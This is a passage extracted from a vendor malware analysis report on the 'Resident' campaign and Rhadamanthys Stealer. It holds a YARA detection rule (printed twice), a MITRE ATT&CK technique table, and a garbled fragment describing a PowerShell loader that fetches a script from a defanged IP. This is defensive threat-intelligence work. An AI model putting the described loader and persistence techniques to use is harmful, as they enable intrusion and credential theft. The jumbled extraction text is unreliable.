rule Rhadamanthys_Stealer {
 meta:
 author = "eSentire Threat Intelligence"
 date = "2023-01-17"
 version = "1.0"
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 30 of 34

strings:
 $shellcode = {37 41 52 51 41 41 41 41 53 43 49 4A 41 51 41 45 41 41 41 42 49 41 49 42}
 $API1 = "LoadLibraryA"
 $API2 = "CreateCompatibleBitmap"
 $API3 = "GetProcAddress"
 
 condition:
 $shellcode and all of ($API*)
}
rule Rhadamanthys_Stealer {
 meta:
 author = "eSentire Threat Intelligence"
 date = "2023-01-17"
 version = "1.0"
 MD5 = "ccefe8680b7d168a9e840d25a6925db3"
 
 strings:
 $shellcode = {37 41 52 51 41 41 41 41 53 43 49 4A 41 51 41 45 41 41 41 42 49 41 49 42}
 $API1 = "LoadLibraryA"
 $API2 = "CreateCompatibleBitmap"
 $API3 = "GetProcAddress"
 
 condition:
 $shellcode and all of ($API*)
}
MITRE ATT&CK
MITRE
ATT&CK
Tactic
ID
MITRE
ATT&CK
Technique
Description
MITRE ATT&CK
Tactic
Reconnaissance
ID
T1592
MITRE ATT&CK
Technique
Gather Victim
Host Information
Description
Resident performs the reconnaissance on the infected host,
for example viewing the members of the "Domain Admins"
group in the current domain, IP configurations and the current
user's group memberships. It also gathers the information on
active processes, caption, command line, creation date,
computer name, executable path, OS name, and Windows
version
MITRE ATT&CK
Tactic
ID MITRE ATT&CK
Technique
Description
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 31 of 34

Initial Access T1566.001 Phishing Resident initial payload is delivered via a phishing email
containing an attachment
MITRE ATT&CK
Tactic
Executionn
ID
T1059.007
MITRE ATT&CK
Technique
Command and
Scripting
Interpreter:
JavaScript
Description
Initial Resident payload is written in JavaScript
MITRE ATT&CK
Tactic
Persistence
ID
T1053.005
MITRE ATT&CK
Technique
Scheduled
Task/Job:
Scheduled Task
Description
Resident creates a copy of itself and schedules a task to run it
every 10 minutes starting from the time when the binary was
first executed
MITRE ATT&CK
Tactic
Persistence
ID
T1547.009
MITRE ATT&CK
Technique
Boot or Logon
Autostart
Execution:
Shortcut
Modification
Description
CUGraphic.lnk is created to run the AutoHotKey and
Imdb.vbs scripts
MITRE ATT&CK
Tactic
Cobalt Strike
ID
S0154
MITRE ATT&CK
Technique
Description
Resident deploys Cobalt Strike on the infected hosts
MITRE ATT&CK
Tactic
Collection
ID
T1113
MITRE ATT&CK
Technique
Screen Capture
Description
Resident campaign are utilizing various tools to capture the
screenshot of the infected host
To learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next Level
MDR, connect with an eSentire Security Specialist now.
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 32 of 34

GET STARTED
ABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your
organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security
Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an
extension of your security team to continuously improve our Managed Detection and Response service. By providing
complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat
hunts augmented by original threat research, we are laser-focused on defending your organization against known and
unknown threats.
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 33 of 34

Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
Page 34 of 34

The malicious PowerShell The PowerShell script command mentioned loads kernel32.dll and before retrieves crypt32.dll via LoadLibraryA and executes the PowerShell and uses the script from function CryptStringToBinaryA 31.41.244[.]142.
from crypt32.dll to convert the base64 string to a binary format (Figure 10).
  Page 7 of 34